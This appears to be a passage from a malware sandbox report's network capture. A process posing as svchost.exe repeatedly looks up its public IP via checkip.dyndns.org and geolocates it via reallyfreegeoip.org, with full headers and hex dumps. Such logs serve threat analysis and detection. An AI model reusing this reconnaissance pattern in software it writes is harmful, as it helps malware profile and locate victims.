                                                                                                                Date: Fri, 10 Jan 2025 14:33:46 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49711 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:47.096369028 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
Jan 10, 2025 15:33:47.776971102 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49713 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:48.393336058 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:49.095928907 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:48 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49715 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:49.729612112 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:50.414072990 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49717 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:51.031208038 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:51.713777065 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:52.344095945 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:53.031411886 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:52.875242949 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:53.550580978 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:53 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:33:53.559459925 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 15:33:53.770607948 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:53 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:33:55.436769962 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 15:33:55.644865990 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:55 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49739 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:56.281752110 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 15:33:56.970197916 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:56 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49747 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:57.623442888 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:58.294287920 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49759 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:58.903275013 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:33:59.575700998 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:59 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49770 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:34:00.209162951 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:34:00.880506992 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:34:00 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49780 | 132.226.247.73 | 80 | 6572 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:34:01.477643013 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:34:02.158644915 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:34:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49790 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 6572 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:34:02.790523052 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:34:03.479990959 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:34:03 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49801 | Destination IP: 132.226.247.73 | Destination Port: 80 | PID: 6572 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:34:04.139734030 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 15:34:04.811778069 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:34:04 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49705 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 14:33:43 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834412
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF6HiNELroAvLieLYU7XkwuA7xjJnPWm0zUWeixQ0NkCec1fmkwfcNZKQh6%2FJPtVJVYgczoMzTb06%2B%2BpgrLSQR2gzASKL4Y8igZJFRWWwDtP9QFxlsZKhHgY6z81qCeNIIQvZdbi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd623e8fdd1875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1617&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1377358&cwnd=153&unsent_bytes=0&cid=ec41c50879f003a1&ts=181&x=0"
2025-01-10 14:33:43 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49706 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:44 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:44 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834413
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTHRhg1E5gj%2F5g5l2rJXbqTHraqlfACAyoEWQGstVRI7A28zP379jUylc8MvwUzNntsf%2FYv0DQupo%2BYko7Tr5chb6cUDnj45z5whH2uj6%2BnZcs5ZLYsUiEVENnMv8gCMHcmuEC7D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd6244187072b9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1823&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1601755&cwnd=217&unsent_bytes=0&cid=b0158b1a98d7ffb5&ts=166&x=0"
2025-01-10 14:33:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 14:33:45 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:45 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834414
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhtlda51eggYTtKeNWFoFQQ8lMycjGt4sKTJj%2BDsLrvrpSlMC10UDZMaPxC9IrHY5Z0Db0FHH2lgEAlEZVpGQKWLMZzlMn2E6wCBAOBHQbxwvMhO4Zi6AFces8Ux78isNoCJnsgC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd624c7e3ec327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1621&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1671436&cwnd=189&unsent_bytes=0&cid=4ec609c8e013e7e5&ts=173&x=0"
2025-01-10 14:33:45 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 104.21.32.14 | Destination Port: 443 | PID: 2684 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:33:46 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 14:33:47 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 14:33:47 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1834416
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWMQwIO9L3OMk2VRvNe4cARMyO7gQogIzaFlC2FnU8u4BKc%2FtsOAywASx6fuU9qOjxXz9f5J6f1CSUvMKoy3AqWSpzF861vtMn0A4imUE84keZ9A6Ea5mePL4ncl8fQqsuUNhehj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffd6254faa01875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1578&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=153&unsent_bytes=0&cid=ec2d9e1e45f87a2b&ts=164&x=0"
